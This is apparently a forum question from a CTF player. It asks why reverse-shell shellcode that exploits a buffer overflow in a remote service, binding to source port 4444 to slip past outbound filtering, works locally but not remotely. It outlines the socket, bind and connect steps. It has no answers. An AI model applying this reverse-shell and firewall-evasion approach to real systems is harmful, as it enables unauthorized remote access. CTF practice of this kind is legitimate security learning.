2

So, I'm trying to solve a CTF challenge that involves exploiting a remote service. The service doesn't check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flow to my shellcode, the program closes the connection. So, I'm trying to have my shellcode connect back to me. A small hurdle is that the server allows outbound connections only through port 4444. So, my shellcode does the following

  1. socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  2. bind(socket_fd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16)
  3. connect(socket_fd, {sa_family=AF_INET, sin_port=htons(port_no), sin_addr=inet_addr("ip")}, 16)

I am trying to get a reverse TCP session and I believe by binding to port 4444 the outbound connection will go through 4444. While the exploit works on my local system, the remote exploit does not work. Any thoughts on what Im missing or what I should be considering? Thanks!

0 Answers0